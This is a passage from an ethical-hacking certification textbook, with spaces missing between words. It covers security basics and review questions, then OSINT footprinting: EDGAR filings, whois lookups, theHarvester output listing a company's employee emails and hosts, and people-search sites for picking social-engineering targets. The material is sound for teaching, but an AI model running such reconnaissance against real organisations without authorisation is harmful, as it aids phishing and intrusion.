SecurityFoundations■MuchaswiththeauditingunderWindows,theauditingunderLinuxneedstobeconfigured.Youdothisbycreatingrulesthatareusedbytheauditddaemon.Youcanmakethechangesdirectlyintheconfigurationfiles,oryoucanaddtherulesonthecommandlineusingtheauditctlcommand.Thisimplementschangesdirectlyandiswhatgetscalledastheauditsystemiscomingup.Whatgointotheconfigurationfilearethecommand-­lineparametersthatwouldgetpassedtoauditctl.SummaryTherearesomeessentialconceptsininformationsecuritythatweneedtogetbehindus.Thefirstarethethreeelementalpropertiesofinformationsecurity—­confidentiality,integrity,andavailability.Confidentialityistheneedtokeepsecretinformationsecret.Integritymeansensuringthatdatadoesn’tchangewhenitisn’texpectedtochange.Finally,availabilitymeansinformation,includingservices,isavailablewhenitisexpectedtobeavailable.Beyondthetriad,asconfidentiality,integrity,andavailabilityareknown,istheParkerianhexad,whichaddsinutility,authenticity,andpossessionorcontrol.Therearetechnologyelementsthatarecommonlyimplemented.Oneyouwillseealmosteverywhereisafirewall.Firewallscomeinmultipleareasoffunctionality,however.Themostbasicfirewallispacketfiltering,meaningdecisionscanbemadebasedonpacketheaders.Statefulfirewallsfactorinthestateoftheconnectionwhenitcomestodecisionsaboutallowingorblockingtraffic.Deeppacketinspectionfirewallscanlookatthedatapayloadtodeterminewhethertoblockmessages.Finally,unifiedthreatmanagementdevices,whichsomecallnext-­generationfirewalls,cantakefirewallfunctionalitytoanewlevelbyalsoaddinginantivirus.Theantiviruslooksatthenetworkstreamformalwareratherthanwaitinguntilitgetstotheendpoint.Applicationlayergatewaysarealsoavariationofafirewall.Thesearedevicesthatareawareoftheapplicationlayerprotocolsandcanmakedecisionsaboutthepacketsbasedonwhetherthetrafficmatchestoallowedendpointsandwhethertheflowiscorrectbasedontheprotocol.Technologyaloneisn’tenough.Adefense-­in-­depthstrategyapplieslayersnotonlytotheplacementofthetechnologybutalsotothepolicies,procedures,andstandardsthatarerequiredtoguidethesecurityfunctions.Defenseinbreadthaddsinabroaderviewtodefenseindepthwithalotofadditionalsurroundacrosstheorganization.Thismayincludeawarenesstraining,detection,preparationforresponse,andothercapabilitiesthatarebeyondjustpreventingattacks.Preparingforattacksisessentialinbusinessestoday.Certainlythereareincidentresponseplans,policies,andteams.However,fromatechnologystandpoint,loggingandauditingcanbeveryhelpfulwhenitcomestimetorespond.Loggingmaybesystemloggingorapplicationlogging,wherethereisatrailofactionsthathavebeendeterminedbytheprogrammer.Whenitcomestoauditing,Windowsauditingcapabilitiesincludesuccessorfailurelogsforaccesstofiles,users,orothersystemobjects.OntheLinuxside,auditrulescanbewrittentowatchfilesanddirectoriesaswellassystemcalls.ReviewQuestions 93ReviewQuestionsYoucanfindtheanswersintheappendix.1.Toremovemalwarefromthenetworkbeforeitgetstotheendpoint,youwouldusewhichofthefollowing?A.PacketfilterB.ApplicationlayergatewayC.UnifiedthreatmanagementapplianceD.Statefulfirewall2.Ifyouwereonaclientengagementanddiscoveredthatyouleftanexternalharddrivewithessentialdataonitathome,whichsecurityprinciplewouldyoubeviolating?A.ConfidentialityB.IntegrityC.NonrepudiationD.Availability3.Howwouldyoucalculaterisk?A.Probability*lossvalueB.Probability*mitigationfactorC.(Lossvalue+mitigationfactor)*(lossvalue/probability)D.Probability*mitigationfactor4.Whichofthefollowingisonefactorofadefense-­in-­depthapproachtonetworkdesign?A.SwitchesB.UsingLinuxonthedesktopC.OpticalcableconnectionsD.Accesscontrollistsonrouters5.Howwouldyouensurethatconfidentialityisimplementedinanorganization?A.WatchdogprocessesB.EncryptionC.CryptographichashesD.Webservers6.Anintrusiondetectionsystemcanperformwhichofthefollowingfunctions?A.BlocktrafficB.FiltertrafficbasedonheadersC.GeneratealertsontrafficD.Logsystemmessages94 Chapter3  SecurityFoundations■7.Whichofthesewouldbeanexampleofalossofintegrity?A.UsermakingchangestoafileandsavingitB.BadblocksflaggedondiskC.CreditcardspassedincleartextD.Memoryfailurescausingdiskdriverstorunincorrectly8.Whatwouldyouuseasecurityinformationeventmanagerfor?A.AggregatingandprovidingsearchforlogdataB.ManagingsecurityprojectsC.EscalatingsecurityeventsD.Storingopensourceintelligence9.Whyisitimportanttostoresystemlogsremotely?A.Localsystemscan’thandleit.B.Bandwidthisfasterthandisks.C.Attackersmightdeletelocallogs.D.Itwilldefendagainstattacks.10.WhatwouldbenecessaryforaTCPconversationtobeconsideredestablishedbyastatefulfirewall?A.FinalacknowledgmentmessageB.Three-­wayhandshakecompleteC.SequencenumbersalignedD.SYNmessagereceived11.Whatisthepurposeofasecuritypolicy?A.Toprovidehigh-­levelguidanceontheroleofsecurityB.ToprovidespecificdirectiontosecurityworkersC.ToincreasethebottomlineofacompanyD.Toalignstandardsandpractices12.WhatadditionalpropertiesdoestheParkerianhexadofferovertheCIAtriad?A.Confidentiality,awareness,authenticityB.Utility,awareness,possessionC.Utility,possession,authenticityD.Possession,control,authenticity13.Whatimportanteventcanbeexposedbyenablingauditing?A.SystemshutdownB.ServicestartupReviewQuestions C.PackageinstallationD.Userlogin14.Whatcananintrusionpreventionsystemdothatanintrusiondetectionsystemcan’t?A.GeneratealertsB.BlockorrejectnetworktrafficC.Completethethree-­wayhandshaketobogusmessagesD.Logpackets15.Whichoftheseisanexampleofanapplicationlayergateway?A.WebapplicationfirewallB.Runtimeapplicationself-­protectionC.JavaappletD.Intrusionpreventionsystem16.Whichinformationwouldapacketfilterusetomakedecisionsaboutwhattraffictoallowintothenetwork?A.HTTPREQUESTmessageB.EthernettypeC.UDPsourceportD.SNMPOID17.Whichofthefollowingproductsmightbeusedasanintrusiondetectionsystem?A.ElasticStackB.PrewikkaC.SnortD.Snorby18.Whichoftheseisn’tanexampleofanattackthatcompromisesintegrity?A.BufferoverflowB.ManinthemiddleC.HeapsprayingD.Wateringhole19.Whattypeofattackisacompromiseofavailability?A.WateringholeB.DoSC.PhishingD.Bufferoverflow9596 Chapter3  SecurityFoundations■20.WhatimportantfunctioncanEDRoffertosecurityoperationsstaff?A.HostisolationB.MalwaredetectionC.RemotedatacollectionD.AlloftheaboveChapter4Footprintingand ReconnaissanceTHEFOLLOWINGCEH TOPICSARECOVEREDINTHISCHAPTER:✓✓Technicalassessmentmethods✓✓Portscanning✓✓Privacyandconfidentiality✓✓Dataanalysis✓✓VulnerabilityscanningIt’scommonlybelievedthatattackersdoalotofworkupfrontbeforelaunchingattacks.Theygetasenseofhowlargetheattacksurfaceisandwheretheirtargetsare.Thiscantakealotofwork,usingalotofdifferenttoolandskillsets.Theprocessofgettingthesizeandscopeofthetargetiscalledfootprinting—­inotherwords,theattacker,oryou,theethicalhacker,istryingtopickupthefootprintofthetargetorganization.Whenitcomestoethicalhacking,youmayhavesomehelpfromthetarget,whowouldhaveemployedyouforyourservices.Theymayprovideyouwithsomefootholdstogetasenseofthescopeandscaleofwhatyoushouldbedoing.It’spossible,though,thatyouarestartingblindandyouhavetogetyourownfootholds.Therearealotofplacesyou,asanethicalhacker,cangetinformationaboutyourtargets,though.Opensourceintelligenceisthetermthatdescribesidentifyinginformationaboutyourtargetusingfreelyavailablesources.Thereareotherplaceswhereyoucanacquireinformationinotherthanlegalways,andofcourse,youcoulddirectlyinfiltrateacompany’sphysicallocationstogetsomeinformationthatyoucanuseagainstyourtarget.That’spotentiallyillegalanddefinitelynotopensource.Theobjectivehereistoacquiredatathatyouneedwithouttippingoffyourtargetthatyouaredoingit.Thisiswhyyoumightusethird-­partysourcestoacquiretheinformationyouneed.Youcanalsogatheralotofdetailsbyinteractingwithservicesatthetargetinwaysthatwouldbeexpected.Asanexample,youmightvisittheirwebsiterequestingpages,justasanyothervisitortotheirsitemightdo.Nothingspecialaboutwhatyouareaskingfororhowyouareaskingforit.However,ifyouknowwheretolook,youcangatheralotofinformationaboutsystemsandtechnologyinusebyyourtarget.OnesourceofalotofdetailaboutyourtargetistheDomainNameSystem(DNS).Thisisn’tsomethingalotofpeoplespendtimethinkingabout.Whenitworks,youhavenoideabecauseithappensquietlyinthebackground.However,thereisalotofdatastoredinDNSserversaboutdomainsandevenIPaddressblocks.Thisdatacanbemined,andyoucangetabetterunderstandingaboutyourtargetandsystemsandtheIPaddressblocksthatmaybeassociatedwithyourtarget.ItmaybeusefulasyouworkthroughthedifferentstagesofatestingmethodologytoidentifymatchestotheMITREATT&CKFramework.We’reinluckonthisphase.TheATT&CKFrameworkhasareconnaissancephase,anditcoversscanningaswellasgatheringinformationfromdifferentsourcesaboutdifferentaspectsofthetarget.Whileit’scommontothinkthatattackersarelookingforvulnerabilitiesandsystemsofinterest,theyareprobablymorelikelytolookforhumantargets.Thismaybeidentifyingemployeesandemailaddressesbutalso,perhapsjustasimportant,knowingwhatthoseemployeesdo,whichwilltelltheattackerhowmuchaccesstheyhave.Moreaccessmeansanattackermaybeabletogettosomethingthatcaneasilybemonetized.OpenSourceIntelligence 99Overthecourseofthischapter,we’llgooversourcesofinformationaboutyourtargetaswellasthetoolsyouwouldusetogatherthatinformation.Whilemuchofitisquietandthereisatleastonetoolthatisentirelypassive,thereissomeactiveinvestigationaswell.Thefirstplacetostart,though,ishowtouseopensourcesofdatatoidentifyajumping-­offpointforgettinginformationaboutyourtarget.OpenSourceIntelligenceThereareacoupleofreasonsyoumaywanttouseopensourceintelligence.Thefirstisthatyouhaven’tbeenprovidedwithanydetailsaboutyourtarget.Youmaybedoingatrueredteamagainstthetargetcompanyandsystems.Inthatcase,youneedtolocateasmuchinformationasyoucansoyouknownotonlywhatyourattacksurfacelookslikebutpossiblewaysin.Additionally,youcanfindalotofinformationaboutindividualswithinanorganization.Thisisespeciallyusefulbecausesocialengineeringattackshaveagoodpossibilityofsuccess.Havingcontactstogoafterisessential.Thesecondreasonisthatorganizationsaren’talwaysawareoftheamountofinformationtheyareleaking.Asnotedearlier,attackerscanfindfootholds,aswellaspotentialhumantargetsforsocialengineeringattacks.Ifyouareworkinghandinhandwiththecompanyyouareperformingtestingfor(thatis,youaredoingwhite-­boxtesting),youdon’tneedtouseopensourceintelligenceforstartingpoints,butyoushouldstillgatherwhatinformationisavailablefortheawarenessofthecompany.Theymaybeabletolimittheirexposure.Evenifthereisn’tanythingthatcouldbepulledback,theycouldworkonawarenesssoemployeesandtheorganizationasawholearen’tleakinginformationunnecessarily.Thereareanumberoftoolsthatcanbeusedtoautomatethecollectionofinformation,andwe’llcovertheiruseaspartoflookingathowtogatheropensourceintelligenceaboutcompaniesandpeople.We’llalsotakealookatsocialnetworkingsitesandsomeofthewaysthosewebsitescanbeused.Evenincaseswhereprivacysettingsarelockeddown,thereisstillalotofinformationthatcanbegathered.Therearealsositesthatexisttobepublic,andthosecandefinitelybeused.CompaniesThereareseveralstartingpointswhenitcomestoacquiringopensourceintelligenceaboutyourtarget.Thefirstistolookatthecompanyoverall.You’llwanttogatherinformationaboutlocationsthecompanyhas.Thereareinstanceswherethiscanbeeasy.However,increasingly,itcanbeharder.Thereasonitcanbeharderisthatcompaniesrecognizethatthemoreinformationtheyprovide,themorethatinformationcanbeusedagainstthem.So,unlesstheyarerequiredtoprovidethatinformationbyregulations,theydon’tprovideit.Thereareafewresourcesthatcanbeusedtogatherinformationaboutcompanies.Sometimes,theseresourcescanbeusedtogatherinformationthatmaybeusedforsocialengineeringattacks.Insomecases,youwillbeabletogatherdetailsaboutacompany’snetwork.Bothtypesofinformationcanbeuseful.Detailsaboutacompanyandits100 Chapter4  Footprintingand Reconnaissance■organizationalandgovernancestructurecancomefromadatabasemaintainedbytheU.S.government,inthecaseofbusinessesregisteredhere.DetailsaboutthebusinessnetworkmaycomefromdatabasesmaintainedbytheorganizationsthatareresponsibleforgovernanceoftheInternet.EDGARPubliccompaniesarerequiredtoprovideinformationaboutthemselves.Thereareresourcesyoucanusetolookupthatinformation.Intheprocess,youmaygatherinformationaboutacompany’sorganizationalstructure.Theorganizationalstructurecantellyouwhohaswhatposition,sowhenyouareworkingonsendingoutemailmessagestogatheradditionalinformationlater,youknowwhotheyshouldappeartobefrom.Youcanselecttheholderofanappropriateposition.TheSecuritiesandExchangeCommission(SEC)hasadatabasethatstoresallpublicfilingsassociatedwithacompany.TheElectronicDataGathering,Analysis,andRetrieval(EDGAR)systemcanbeusedtolookuppublicfilingssuchastheannualreportintheform10-­K.Additionally,thequarterlyreports,10-­Qs,arealsosubmittedtoEDGARandstoredthere.Thesereportsprovidedetailsaboutacompany’sfinances.The11-­K,aformincludingdetailsaboutemployeestockoptionplans,isalsofiledwithEDGAR.AccessingEDGARisaseasyasgoingtoEDGARattheSECwebsite.Youcanseethesearchfield,partofthepage,inFigure 4.1.FIGURE 4.1 EDGARsiteOneofthemostusefulformsyoucanfindinEDGARisSchedule14-­A,whichisaproxystatementandwillincludetheannualreporttotheshareholders,whichmayincludealotofusefulinformationforyou.Asanexample,Figure 4.2showsaverysmallsectionoftheannualreporttotheshareholdersforMicrosoftCorporation.OthersectionsthatarenotshownincludeCorporateGovernanceatMicrosoft,BoardofDirectors,andAuditCommitteeMatters.Whileatahighlevel,whatisincludedinthesereportswillbethesameacrossallpubliccompanies,theremaybesomecompaniesthatpresentmoreinthewayofspecificdetailsthanothercompanies.Somecompanieswillhavemoretoreportthanothers.Forinstance,thetableofcontentsfortheMicrosoftreportshowsthepagetotalinthe80s.ThereportforJohnWiley&Sonsshowsapagecountinthe50s.That’sabout30fewerpagesbetweenthetwocompanies.OpenSourceIntelligence 101FIGURE 4.2 PortionofSchedule14-­AforMicrosoftDomainRegistrarsEDGARisonlyforpubliccompanies.Noteverycompanyispublic.Youdon’tgetthesamelevelofinsightforaprivatecompanythatyoudoforapubliccompany.However,EDGARisnottheonlyresourcethatcanbeusedtogatherinformationaboutacompany.Anothersourceofinformation,relatedtotheInternetitself,isthedomainregistrars.Youwon’tgetthesamesortofinformationfromthedomainregistrarsasyouwouldfromEDGAR,butit’sstillsometimesadecentsourceofinformation.Forastart,youcangettheaddressofwhatisprobablythecompany’sheadquarters.Thisisnotaguarantee,however.Asmentioned,companiesarestartingtohideinformationprovidedtotheregistrars.Informationishiddenbehindtheregistrar.Whenyouaskforinformation,youwillgetwhattheregistrarhasbeenaskedtopresentandnotnecessarilytherealdetails.Thereisnothingthatsaysthattheregistrarshavetobeprovidedwithrealaddresses,unlesstheyarecheckingabillingaddressonacreditcardforpayment.Infact,therehavebeentimesIhavehaddomainsregisteredwithbogusphonenumbersandincorrectaddresses.Sincethedataispublic,it’simportanttobecarefulaboutwhatisshared.Anyonecanminetheregistriesforthisinformationanduseitforanynumberofpurposes.102 Chapter4  Footprintingand Reconnaissance■Beforewegettoofardownthisroad,though,it’sprobablyusefulforyoutounderstandhowtheInternetisgovernedwhenitcomestodomainsandaddresses.First,thereistheInternetCorporationforAssignedNamesandNumbers(ICANN).UnderneathICANNistheInternetAssignedNumbersAuthority(IANA),whichisresponsibleformanagingIPaddresses,ports,protocols,andotheressentialnumbersassociatedwiththefunctioningoftheInternet.PriortotheestablishmentofICANNin1998,IANA’sfunctionsweremanagedbyoneman,JonPostel,whoalsomaintainedtherequestforcomments(RFC)documents.InadditiontoICANN,responsiblefornumbering,arethedomainregistrars.Theseorganizationsstoreinformationaboutaddressestheyareresponsibleforaswellascontacts.Therewasatimewhenregisteringadomainandotherdatawentthroughasingleentity.Now,though,thereareseveralcompaniesthatcanperformregistrantfunctions.Ifyouwanttoregisteradomain,yougotoaregistrarcompanylikeDomainMongerorGoDaddy.Thosecompaniescanthenbequeriedfordetailsaboutthedomains.TograbinformationoutoftheregionalInternetregistry(RIR),youwouldusethewhoisprogram.ThisisaprogramthatcanbeusedonthecommandlineonmostUnix-­likesystems,includingLinuxandmacOS.Therearealsowebsitesthathaveimplementationsofwhoisifyoudon’thaveaUnix-­likesystemhandy.Hereyoucanseeaportionoftheoutputfromawhoisquery.whoisQueryofwiley.com$%%%whoiswiley.comIANAWHOISserverformoreinformationonIANA,visithttp://www.iana.orgThisqueryreturned1objectrefer:whois.verisign-­grs.comdomain:COMorganisation:address:address:address:VeriSignGlobalRegistryServices12061BluemontWayRestonVirginia20190UnitedStatescontact:name:organisation:address:address:address:phone:fax-­no:administrativeRegistryCustomerServiceVeriSignGlobalRegistryServices12061BluemontWayRestonVirginia20190UnitedStates+1703925-­6999+17039483978OpenSourceIntelligence e-­mail:[email protected]­grs.com←-­SNIP→DomainName:wiley.comRegistryDomainID:936038_DOMAIN_COM-­VRSNRegistrarWHOISServer:whois.corporatedomains.comRegistrarURL:www.cscprotectsbrands.comUpdatedDate:2017-­10-­07T05:19:30ZCreationDate:1994-­10-­12T04:00:00ZRegistrarRegistrationExpirationDate:2019-­10-­11T04:00:00ZRegistrar:CSCCORPORATEDOMAINS,INC.RegistrarIANAID:299RegistrarAbuseContactEmail:[email protected]RegistrarAbuseContactPhone:+1.8887802723DomainStatus:clientTransferProhibitedhttp://www.icann.org/epp#clientTransferProhibitedRegistryRegistrantID:RegistrantName:DomainAdministratorRegistrantOrganization:JohnWiley&Sons,IncRegistrantStreet:111RiverStreetRegistrantCity:HobokenRegistrantState/Province:NJPostalCode:07030RegistrantCountry:USRegistrantPhone:+1.3175723355RegistrantPhoneExt:RegistrantFax:+1.3175724355RegistrantFaxExt:RegistrantEmail:[email protected]RegistryAdminID:AdminName:DomainAdministratorAdminOrganization:JohnWiley&Sons,IncAdminStreet:111RiverStreetAdminCity:HobokenAdminState/Province:NJPostalCode:07030AdminCountry:USAdminPhone:+1.3175723355AdminPhoneExt:AdminFax:+1.3175724355AdminFaxExt:AdminEmail:[email protected]103104 Chapter4  Footprintingand Reconnaissance■Thereisalotofoutputtheretolookthrough,andI’vesnippedoutabunchofittokeepittoreallyrelevantinformation.First,whoischeckswithIANA’swhoisservertofigureoutwhoitneedstocheckwithaboutthisspecificdomain.Youcanseethathappenattheverytopoftheoutput.IANAindicatesthatVeriSignistheregistrarforthisdomain.WegetthedetailsabouttheregistrarVeriSign.Afterthat,andalotofinformationbeingsnippedout,wefinallygetthedetailsaboutthedomainwiley.com.Whatyoucanseeintheoutputistheaddressandphonenumberforthecompany.Additionally,yougetinformationaboutahandfulofcontactsforthecompany.Registrarsexpectanadministrativecontactandatechnicalcontact.Asindicatedearlier,notalldomainswillprovidethislevelofdetail.Anexampleofadomainthatdoesn’tincludeanycontactdetailsisspamhaus.org.Hereyoucanseethatthecontactinformationshowsthatthedatahasbeenredactedforprivacy.DetailsAboutspamhaus.orgRegistryRegistrantID:REDACTEDFORPRIVACYRegistrantName:REDACTEDFORPRIVACYRegistrantOrganization:TheSpamhausProjectRegistrantStreet:REDACTEDFORPRIVACYRegistrantCity:REDACTEDFORPRIVACYRegistrantState/Province:RegistrantPostalCode:REDACTEDFORPRIVACYRegistrantCountry:CHRegistrantPhone:REDACTEDFORPRIVACYRegistrantPhoneExt:RegistrantFax:REDACTEDFORPRIVACYRegistrantFaxExt:RegistrantEmail:26a6047fb7bb1b2a0e5ea9927ed7f15c-­[email protected]RegistryAdminID:REDACTEDFORPRIVACYAdminName:REDACTEDFORPRIVACYAdminOrganization:REDACTEDFORPRIVACYAdminStreet:REDACTEDFORPRIVACYAdminCity:REDACTEDFORPRIVACYAdminState/Province:REDACTEDFORPRIVACYAdminPostalCode:REDACTEDFORPRIVACYAdminCountry:REDACTEDFORPRIVACYAdminPhone:REDACTEDFORPRIVACYAdminPhoneExt:AdminFax:REDACTEDFORPRIVACYAdminFaxExt:AdminEmail:a25006f8175341e32979e6f59e7b87ea-­[email protected]OpenSourceIntelligence 105Usingastrategylikethiswillkeepinformationprivateandoutofthehandsoftheverypeoplespamhaus.orgseekstoprotectagainst.Thedataprovidedcanbeusedtocreateamailinglistforspammers.Itcanalsobeusedtocreateaphysicalmailinglistfortraditionaljunkmailproviders(sometimescalledmailmarketingcompanies).RegionalInternetRegistriesNotalltheusefulinformationisstoredwiththedomainregistrars,however.Thereisotherdatathatisimportanttobekept.Earlier,wediscussedIANA.WhiletheIANAserverprovidedinformationaboutdomainregistrars,itspurposehaslongbeentobeacentralclearinghouseforaddresses.Thisincludesnotonlyportnumbersforwell-­knownservicesbutalsoIPaddresses.IANA,atahighlevel,ownsallIPaddresses.IthandsoutthoseIPaddresses,basedonneed,totheRIRs.TheRIRsthenhandthemouttoorganizationsthatfallintotheirgeographicregion.TherearefiveRIRsaroundtheworld.Theyarebasedindifferentgeographicregions,andanorganizationwouldrefertotheRIRwheretheyarelocatedforthingslikeIPaddresses.TheRIRsandthegeographicareastheyareresponsibleforarelistedhere:AfricanNetworkInformationCenter(AfriNIC)  AfricaAmericanRegistryfor InternetNumbers(ARIN)  NorthAmerica(UnitedStatesandCanada)aswellasAntarcticaandpartsoftheCaribbeanAsiaPacificNetworkInformationCentre(APNIC)  Asia,Australia,NewZealand,andneighboringcountriesLatinAmericaand CaribbeanNetworkInformationCentre(LACNIC)  LatinAmericaandpartsoftheCaribbeanRéseauxIPEuropéensNetworkCoordinationCentre(RIPENCC)  Europe,Russia,WestAsia,andCentralAsiaAlloftheseRIRshavetheirowndatabasesthatcanbequeriedusingwhois,justasweusedwhoistoqueryinformationfromthedomainregistrars.Typically,youwouldusewhoisagainsttheRIRstofindoutwhoownsaparticularIPaddress.Forexample,intheoutputforwiley.comearlier,partoftheoutputindicatedwhichnameserversthedomainusestoresolvehostnamestoIPaddresses.Oneofthosenameserversisns.wiley.co.uk.Withaminimalamountofeffort(wewillcovertheDNSlaterinthechapter),wecandiscoverthatthehostnamens.wiley.co.ukresolvestotheIPaddress193.130.68.19.Usingwhois,wecanfindoutwhoownsthatIPaddress.Youcanseetheresultsofthatqueryinthefollowingcode.whoisQueryfor IPAddress$whois193.130.68.19%IANAWHOISserver%formoreinformationonIANA,visithttp://www.iana.org106 Chapter4  Footprintingand Reconnaissance■%Thisqueryreturned1objectrefer:whois.ripe.netinetnum:193.0.0.0-­193.255.255.255organisation:RIPENCCstatus:ALLOCATEDwhois:whois.ripe.netchanged:source:1993-­05IANA%%%%%ThisistheRIPEDatabasequeryservice.TheobjectsareinRPSLformat.TheRIPEDatabaseissubjecttoTermsandConditions.Seehttp://www.ripe.net/db/support/db-­terms-­conditions.pdf%Note:thisoutputhasbeenfiltered.%Toreceiveoutputforadatabaseupdate,usethe"-­B"flag.%Informationrelatedto'193.130.68.0-­193.130.69.255'%Abusecontactfor'193.130.68.0-­193.130.69.255'is'[email protected]'inetnum:netname:descr:country:admin-­c:tech-­c:status:mnt-­by:created:last-­modified:source:193.130.68.0-­193.130.69.255WILEY-­UKJohnWiley&SonsLtdGBTW1873-­RIPETW1873-­RIPEASSIGNEDPAAS1849-­MNT1970-­01-­01T00:00:00Z2010-­12-­29T09:52:04ZRIPE#FilteredOpenSourceIntelligence person:address:address:address:address:address:address:phone:fax-­no:nic-­hdl:created:last-­modified:mnt-­by:source:107TonyWithersJohnWiley&SonsLtdBaffinsLaneChichesterSussexPO191UDEngland,GB+44243770319+44243775878TW1873-­RIPE1970-­01-­01T00:00:00Z2016-­04-­05T14:15:57ZRIPE-­NCC-­LOCKED-­MNTRIPE#Filtered%Informationrelatedto'193.130.64.0/18AS702'route:descr:origin:member-­of:inject:aggr-­mtd:mnt-­by:created:last-­modified:source:193.130.64.0/18UKPArouteAS702AS702:RS-­UK,AS702:RS-­UK-­PAuponstaticoutboundWCOM-­EMEA-­RICE-­MNT2018-­04-­16T14:25:12Z2018-­04-­16T14:25:12ZRIPEThisprovidesuswithalotofusefulinformation.First,eventhoughweprovidedasingleIPaddress,addressesareallocatedinblocks.ThefirstthingwefindisthattheparentblockwasallocatedtoRIPE,theEuropeanRIR,in1993.ThespecificblocktheIPaddressprovidedbelongsto,though,is192.130.68.0–255.Thatblock,unsurprisingly,belongstoJohnWiley&Sons.YoucanseethattheaddressforJohnWiley&SonsisinGreatBritain,whichmatchesupwiththeRIRbeingRIPE.ThebusinessislocatedinEngland,sothecorrespondingregionalregistryistheoneresponsibleforEurope.We’velearnedacoupleofthingsaboutthebusinessandtheIPaddressesthatbelongtoit.Additionally,youcanseewehaveacontactthatcameoutoftheresponse.Thisgivesusanameandemailaddress.Ifweweregoingtobetestingagainstthisbusiness,wecouldmakeuseofthisinformation.108 Chapter4  Footprintingand Reconnaissance■PeopleWhilesystemsandtheIPaddressesassociatedwiththemmakegoodentrypointsfortechnicalattacks—­thoseagainstservicesthatareavailable—­contactinformationforpeoplecanbemoreuseful.Thereareotherplaceswecangotogetlistsofpeoplewhobelongtoatargetorganization.Again,thereareutilitieswecanusetohelpusgatherthisinformation.OneofthemistheHarvester.Thisisascriptthatwillsearchthroughdifferentsourcestolocatecontactinformationbasedonadomainnameprovidedtotheprogram.Inthefollowingcode,youcanseetheoutputfromtheHarvesterrunagainstthedomainwiley.com,usingGoogleasthesearchsource.theHarvesterOutput$theharvester-­dwiley.com-­bgoogle***********************************************************************||_||_____/\/\________________||_______**|__|'_\/_\//_//_`|'__\\//_\/__|__/_\'__|**||_||||__//__/(_|||\V/__/\__\||__/|**\__|_||_|\___|\//_/\__,_|_|\_/\___||___/\__\___|_|****TheHarvesterVer.2.7.2**CodedbyChristianMartorella**Edge-­SecurityResearch**[email protected]­security.com********************************************************************[-­]Startingharvestingprocessfordomain:wiley.com[-­]SearchinginGoogle:Searching0results...Searching100results...Searching200results...Searching300results...Searching400results...Searching500results...Harvestingresults[+]Emailsfound:-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­OpenSourceIntelligence 109[email protected][email protected]cs-­[email protected][email protected][email protected][+]Hostsfoundinsearchengines:-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­Totalhosts:8[-­]ResolvinghostnamesIPs...agupubs.onlinelibrary.wiley.com:65.156.1.101authorservices.wiley.com:216.137.41.119booksupport.wiley.com:208.215.179.132eu.wiley.com:216.137.41.74hub.wiley.com:204.93.79.243newsroom.wiley.com:204.8.173.169onlinelibrary.wiley.com:65.156.1.101www.wiley.com:216.137.41.21GoogleisnottheonlysourcethatcanbeusedwiththeHarvester.Anothersourcethatcanbeused,whichmaynotbeconsideredalot,isaPrettyGoodPrivacy(PGP)keyserver.PGPreliesonpublickeystobeavailableinpubliclyavailablekeyservers.Withoutthese,thepublickeyhastobesharedmanuallybyanyonewhowantstogetanencryptedmessagefromsomeoneelse.Becausethesekeyshavetobeavailabletobeused,theyarestoredandsearchableonwebservers.Sincetheyareassociatedwithemailaddresses,youcansearchforemailaddressesonthekeyserver.Thismaynotalwaysbesuccessful.PeoplewhohavebeenaroundforalongtimemaybemorelikelytohavePGPkeys.Asanexample,youcanseetherunresultsoftheHarvesteragainstoneofmyowndomains.Sincesomeofmyemailaddresseshavebeenaroundformorethan20years,andsinceI’vegenerallyhadahabitofrebuildingmachineswithoutstoringoffencryptionkeys,IhaveafewPGPkeys.Interestingly,theHarvesterwasn’tabletolocateanyofmyPGPkeys.ThisleadsustootherplacestolookforPGPkeys.OneoftheolderpublickeyserversishostedattheMassachusettsInstituteofTechnology(MIT).Ifyougotohttps://pgp.mit.edu,youcanprovideasearchterm,includingadomainname.SearchingusingtheHarvesterdidn’tturnupanyentriesforwiley.com.Doingthesamesearchathttps://pgp.key-­server.io(MIT’ssitewasunresponsiveforthissearch)resultedinahandfulofresults.However,becauseofthewaythesearchinthedatabasewasconducted,thetermwiley.comresultedinanumberofpeoplewhosefirstnamewasWiley,whilethedomainnametheiremailaddresswasinendedin.com.110 Chapter4  Footprintingand Reconnaissance■UsingtheMITsitetosearchformyownkeys,IturnedupallthekeysIhaveloadedintothekeyserversovertheyears.Thisisawaytolookupinformationaboutindividualpeopleifyouneedto,sincetheHarvesterrequiresthatyouprovideadomainname.Inmycase,youcanseetheoutputfromthesearchinFigure 4.3.Myprimaryemailaddresshasthreedifferentkeysassociatedwithit.AsIsaid,Ihadahabitofrebuildingormovingtodifferentmachineswithouteverstoringmyprivatekey.Thismeant,ifIwantedtodoanyPGPencryptedemail,Ihadtoregenerateakeyandreupload.Sincethekeysignatureisdifferent,itdoesn’toverwritetheotherkey.It’spossible,afterall,Icouldhaveafewlegitimatekeysthatareallusedondifferentsystems.FIGURE 4.3 PGPkeyserversearchWhiletoolsliketheHarvesteraregoodforidentifyinginformationaboutpeopleatacompanyautomatically,youmaywantorneedtogodeeper.Thisiswhereyoumightconsiderusingapeoplesearchwebsite,likePipl,Wink,orIntelius.Thesesitescanbeusedtosearchforpeople.AsitelikePiplcanbeusedtoidentifyanonlinepresenceforsomeone.Forexample,usingmynameturnsupahandfulofpoststomailinglists,aswellasaTwitteraccountIdon’tuse.Therearealsoafewotherreferencesthataren’tme.YoucanseeasampleoftheoutputofPiplinFigure 4.4.Thereareotherpeoplesearchsitesthataremorefocusedonlookingatsocialnetworkingpresence,andsearchescanbedoneusingusernames.ThewebsitePeekYouwilldopeoplesearchesusingrealnames,justaswedidwithPipl.PeekYoualsoallowsyoutolookforausernameinstead,though.Thisusernamecouldbefoundacrossmultiplesocialnetworksites,aswellasotherlocationswhereausernameisexposedtotheoutsideworld.AsearchforausernameIhaveusedinthepastturnedupafewhits,thoughtheinformationwasbadlyoutofdateandinconsistent.Anonlinepresence,though,canbeusedformorethanjustfindingpeople.OpenSourceIntelligence 111FIGURE 4.4 